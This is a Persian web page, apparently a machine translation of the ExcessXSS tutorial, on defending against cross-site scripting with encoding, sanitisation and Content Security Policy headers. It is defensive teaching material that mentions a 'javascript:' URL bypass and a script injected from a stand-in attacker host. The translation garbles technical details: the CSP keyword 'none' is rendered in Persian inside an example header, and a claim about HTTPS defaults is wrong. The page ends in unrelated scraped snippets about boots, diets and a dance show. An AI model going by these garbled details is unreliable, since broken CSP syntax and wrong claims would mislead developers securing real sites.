از بین این دو، "انحراف" ساده ترین رویکرد برای پیاده سازی است. اما در نظر گرفته می شود که ضدعفونی مفیدتر باشد زیرا طیف وسیع تری از ورودی را برای کاربر فراهم می کند. به عنوان مثال، اگر کاربر شماره کارت اعتباری را ارسال کند، پاکسازی تمام غیر کاراکترها را حذف می کند و از تزریق کد جلوگیری می کند و همچنین به کاربر اجازه می دهد شماره را با خط فاصله یا بدون خط تیره وارد کند.

اگر تصمیم به اجرای ضدعفونی دارید، باید مطمئن شوید که خود روش ضدعفونی از رویکرد لیست سیاه استفاده نمی کند. به عنوان مثال، URL "Javascript:..."، حتی اگر در لیست سفید به عنوان نامعتبر باشد، از روال ضد عفونی که به سادگی تمام نمونه های "javascript:" را حذف می کند، دور می زند. به همین دلیل، کتابخانه‌ها و چارچوب‌هایی که به خوبی آزمایش شده‌اند باید در صورت امکان از پاک‌سازی استفاده کنند.

رمزگذاری باید اولین خط دفاع شما در برابر حملات XSS باشد، هدف آن پردازش داده ها به گونه ای است که مرورگر نتواند ورودی کاربر را به عنوان کد تفسیر کند. در برخی موارد، کدگذاری باید با اعتبار سنجی تکمیل شود. رمزگذاری و اعتبارسنجی باید برای ترافیک خروجی اعمال شود، زیرا تنها در این صورت می‌توانید بدانید که ورودی کاربر در چه زمینه‌ای اعمال می‌شود و کدگذاری و اعتبارسنجی باید اعمال شود.

به عنوان دومین خط دفاعی، باید ورودی‌های نامعتبر کاربر، مانند پیوندها، در داده‌های دریافتی با استفاده از پروتکل جاوا اسکریپت را پاکسازی یا رد کنید. این به خودی خود نمی تواند امنیت کامل را فراهم کند، اما اگر هر نقطه ای در حفاظت از کدگذاری و اعتبارسنجی به دلیل اجرای نادرست از کار بیفتد، یک اقدام احتیاطی مفید است.

اگر این دو خط دفاعی به طور مداوم استفاده شوند، سایت شما از حملات XSS محافظت می شود. با این حال، به دلیل پیچیدگی ایجاد و نگهداری یک وب سایت، ارائه حفاظت کامل تنها با استفاده از مدیریت امن ورودی کاربر می تواند دشوار باشد. به عنوان خط سوم دفاعی، باید از سیاست های امنیتی محتوا استفاده کنید ( انگلیسی خط مشی امنیت محتوا) سپس CSP که در ادامه توضیح خواهیم داد.

استفاده از مدیریت امن ورودی کاربر برای محافظت در برابر حملات XSS کافی نیست، زیرا حتی یک خطای امنیتی می تواند وب سایت شما را در معرض خطر قرار دهد. استفاده از سیاست‌های امنیت محتوا (CSP) استاندارد وب جدید می‌تواند این خطر را کاهش دهد.

از CSPها برای محدود کردن استفاده مرورگر از یک صفحه وب استفاده می‌شود تا بتواند فقط از منابع دانلود شده از منابع مطمئن استفاده کند. آ منابعاسکریپت ها، شیوه نامه ها، تصاویر یا هر نوع فایل دیگری هستند که در صفحه به آنها ارجاع داده می شود. این بدان معنی است که حتی اگر یک مهاجم بتواند محتوای مخرب را به سایت شما تزریق کند، CSP قادر خواهد بود از اجرای آن جلوگیری کند.

از CSP ها می توان برای اجرای قوانین زیر استفاده کرد:

ممنوعیت منابع غیرقابل اعتماد منابع خارجی را فقط می توان از مجموعه ای از منابع مطمئن کاملاً تعریف شده دانلود کرد. غیرمجاز کردن منابع جاسازی شده در جاوا اسکریپت و CSS رعایت نخواهد شد. غیرفعال کردن eval غیرفعال کردن استفاده از تابع eval در جاوا اسکریپت.

در مثال زیر، یک مهاجم موفق شد کد مخرب را به یک صفحه وب تزریق کند:

آخرین نظر:

با یک خط مشی CSP به درستی تعریف شده، مرورگر نمی تواند malicious‑script.js را بارگیری و اجرا کند زیرا http://attacker/ به عنوان منبع قابل اعتماد فهرست نشده است. حتی اگر سایت قادر به پردازش قابل اعتماد ورودی کاربر نبود، در این مورد، خط مشی CSP از ایجاد آسیب پذیری جلوگیری کرد.

حتی اگر یک مهاجم کد را در داخل کد اسکریپت تزریق کند، نه پیوندی به یک فایل خارجی، یک خط مشی CSP به درستی پیکربندی شده نیز از تزریق به کد جاوا اسکریپت جلوگیری می کند و از آسیب پذیری و ایجاد هر گونه آسیب جلوگیری می کند.

به طور پیش فرض، مرورگرها از CSP استفاده نمی کنند. برای فعال کردن SCP در وب‌سایت‌تان، صفحات باید حاوی یک عنوان HTTP اضافی باشند: Content-Security-Policy. هر صفحه ای که حاوی این سرصفحه باشد، هنگام بارگیری توسط مرورگر، سیاست های امنیتی را اعمال می کند، مشروط بر اینکه مرورگر از CSP پشتیبانی کند.

از آنجایی که خط مشی امنیتی با هر پاسخ HTTP ارسال می شود، این امکان برای سرور وجود دارد که به صورت جداگانه خط مشی را برای هر صفحه تنظیم کند. با درج یک هدر CSP در هر پاسخ، می توان همین سیاست را برای کل وب سایت اعمال کرد.

مقدار در هدر Content-Security-Policy حاوی رشته ای است که یک یا چند خط مشی امنیتی را مشخص می کند که در سایت شما کار می کنند. نحو این خط در ادامه توضیح داده خواهد شد.

مثال‌های عنوان در این بخش از شکسته‌های خط و تورفتگی برای سهولت خواندن استفاده می‌کنند. آنها نباید در هدر واقعی وجود داشته باشند.

نحو هدر CSP به شرح زیر است:

خط مشی امنیت محتوا:
بخشنامه منبع-بیان, منبع-بیان, ...;
بخشنامه ...;
...

این نحو از دو عنصر تشکیل شده است:

• دستورالعمل ها، که رشته هایی هستند که نوع منبع گرفته شده از لیست داده شده را نشان می دهند.
• عبارت منبع مدلی است که یک یا چند سرور را توصیف می کند که می توان از آنها منابع را بارگیری کرد.

برای هر دستورالعمل، داده‌های عبارت منبع تعیین می‌کنند که کدام منابع می‌توانند برای بارگیری منابع از آن نوع استفاده شوند.

دستورالعمل های زیر را می توان در هدر CSP استفاده کرد:

• connect-src
• font-src
• frame-src
• img-src
• media-src
• object-src
• script-src
• style-src

علاوه بر این، دستورالعمل ویژه default-src می تواند برای ارائه یک مقدار پیش فرض برای همه دستورالعمل هایی که در هدر گنجانده نشده اند استفاده شود.

نحو ایجاد یک عبارت منبع به شرح زیر است:

protocol:// host-name: port-number

نام میزبان می تواند با * شروع شود، به این معنی که هر زیر دامنه ای از نام میزبان ارائه شده مجاز خواهد بود. به طور مشابه، یک شماره پورت می تواند به صورت * نمایش داده شود، که به این معنی است که همه پورت ها مجاز خواهند بود. علاوه بر این، پروتکل و شماره پورت ممکن است حذف شوند. در صورتی که هیچ پروتکلی مشخص نشده باشد، خط مشی مستلزم آن است که همه منابع با استفاده از HTTPS بارگیری شوند.

علاوه بر نحو بالا، عبارت منبع می‌تواند یکی از چهار کلمه کلیدی با معنای خاص (شامل نقل قول) باشد:

"هیچ" منابع را غیرفعال می کند. "self" منابع را از میزبانی که صفحه وب در آن قرار دارد حل می کند. "unsafe-inline" به منابع موجود در صفحه به عنوان عناصر درون خطی، عناصر و جاوا اسکریپت: URL ها اجازه می دهد. "unsafe-eval" تابع ارزشیابی جاوا اسکریپت را فعال می کند.

توجه داشته باشید که هر زمان از CSP استفاده می شود، منابع جاسازی شده و eval به طور پیش فرض غیرفعال می شوند. استفاده از "unsafe-inline" و "unsafe-eval" تنها راه استفاده از آنها است.

خط مشی امنیت محتوا:
script-src "self" scripts.example.com;
media-src "هیچ";
img-src*;
default-src "self" http://*.example.com

با این سیاست مثال، صفحه وب دارای محدودیت های زیر خواهد بود:

• اسکریپت ها را فقط می توان از میزبانی که صفحه وب در آن قرار دارد و از این آدرس بارگیری کرد: scripts.example.com .
• فایل های صوتی و تصویری مجاز به آپلود نیستند.
• فایل های تصویری را می توان از هر آدرسی دانلود کرد.
• تمام منابع دیگر را فقط می توان از میزبانی که صفحه وب در آن قرار دارد و از هر زیردامنه example.com دانلود کرد.

از ژوئن 2013، سیاست‌های امنیتی محتوا توسط W3C توصیه می‌شود. CSP توسط توسعه دهندگان مرورگر پیاده سازی می شود، اما برخی از قسمت های آن مختص مرورگرهای مختلف است. برای مثال، استفاده از هدر HTTP ممکن است بین مرورگرها متفاوت باشد. قبل از استفاده از CSP، لطفاً به مستندات مرورگرهایی که قصد پشتیبانی از آنها را دارید، مراجعه کنید.

• حمله XSS یک حمله تزریق کد است که با مدیریت ناامن ورودی کاربر ممکن می شود.
• یک حمله موفق XSS به مهاجم اجازه می دهد تا جاوا اسکریپت مخرب را در مرورگر قربانی اجرا کند.
• یک حمله موفق XSS امنیت وب سایت و کاربران آن را به خطر می اندازد.

• سه نوع اصلی از حملات XSS وجود دارد:
  • XSS ذخیره شده، جایی که ورودی مخرب از پایگاه داده وب سایت منشا می گیرد.
  • منعکس شده XSS، که در آن ورودی مخرب از درخواست قربانی سرچشمه می گیرد.
  • حملات XSS در مدل DOM، که در آن آسیب‌پذیری در کد سمت کلاینت مورد سوء استفاده قرار می‌گیرد، نه در سمت سرور.
• همه این حملات به صورت متفاوتی انجام می شوند، اما در صورت موفقیت، اثر یکسانی دارند.

• مهم ترین راه برای جلوگیری از حملات XSS انجام مدیریت ورودی امن است.
  • هر زمان که ورودی کاربر در صفحه فعال است، رمزگذاری باید انجام شود.
  • در برخی موارد، کدگذاری باید با اعتبار سنجی جایگزین یا تکمیل شود.
  • مدیریت ایمن ورودی باید در نظر داشته باشد که ورودی کاربر در چه زمینه صفحه ای درج شده است.
  • به منظور جلوگیری از انواع حملات XSS، مدیریت ورودی امن باید هم در کد سمت کلاینت و هم در سمت سرور انجام شود.
• سیاست‌های امنیتی محتوا (CSP) یک لایه حفاظتی اضافی در صورت شکست پردازش ورودی امن ارائه می‌کنند.

لازم به ذکر است که یک متقاطع در اصطلاح مورد استفاده برای توصیف XSS وجود دارد: یک حمله XSS به DOM می تواند ذخیره یا منعکس شود. اینها انواع جداگانه ای از حملات نیستند. هیچ اصطلاح پذیرفته شده ای وجود ندارد که تمام انواع XSS را بدون اختلاط پوشش دهد. صرف نظر از اصطلاحات مورد استفاده برای توصیف XSS، مهمترین چیز تعیین نوع حمله است، این امر در صورتی امکان پذیر است که بدانید ورودی مخرب از کجا می آید و آسیب پذیری در کجا قرار دارد.

کد منبع برای ExcessXSSدر GitHub در دسترس است.

ExcessXSSدر سال 2013 به عنوان بخشی از دوره امنیت مبتنی بر زبان در دانشگاه صنعتی چالمرز ایجاد شد.

ترجمه به روسی توسط A888R انجام شد، متن اصلی به زبان انگلیسی: excess-xss.com، نظرات، پیشنهادات و خطاهای ترجمه را به اینجا ارسال کنید.

مقالات توسطموضوع:

آسیب پذیری XSS چیست؟ اسکریپت بین سایتی با استفاده از اسکریپت جاوا محبوب ترین نوع حمله است. در این مقاله به شما خواهیم گفت که استفاده از اسکریپت جاوا چه مشکلاتی ایجاد می کند و چگونه از خود در برابر حملات XSS محافظت کنید. حمله XSS چیست؟ XSS - نوع	مسیرها: تاریخ و مدرنیته این کفش ها در نگاه اول تا حدی وحشیانه به نظر می رسند. اما در چنین تضادی، زن حتی شکننده تر و برازنده تر به نظر می رسد. و پاها که چکمه های بالای زانو پوشیده شده اند، کاملاً باریک به نظر می رسند. آج این کفش ها در اصل چکمه های سواره نظام با بالا بودند
برای کاهش وزن چه بخوریم: چه غذاهایی به کاهش وزن کمک می کنند چه چیزهایی به کاهش وزن کمک می کند که به کاهش وزن کمک می کند. کاهش وزن، حذف عوامل خطر برای افزایش وزن - همه اینها یک موضوع تحقیقاتی بسیار مرتبط است. در مطالعه ای که در میسوری (ایالات متحده آمریکا) با استفاده از توموگرافی کامپیوتری انجام شد، ارزیابی	اولین ترکیب رقص در TNT همه بیست شرکت کننده فصل 3 رقص، قسمت 22 به آخرین کنسرت گالا آمدند تا آن را به یک تعطیلات واقعی تبدیل کنند. دوئت های غیرمنتظره، اعدادی که به کلاسیک های فصل تبدیل شده اند، رقص های دسته جمعی روشن ... تا همین اواخر، ما بازیگران را در سراسر روسیه دنبال می کردیم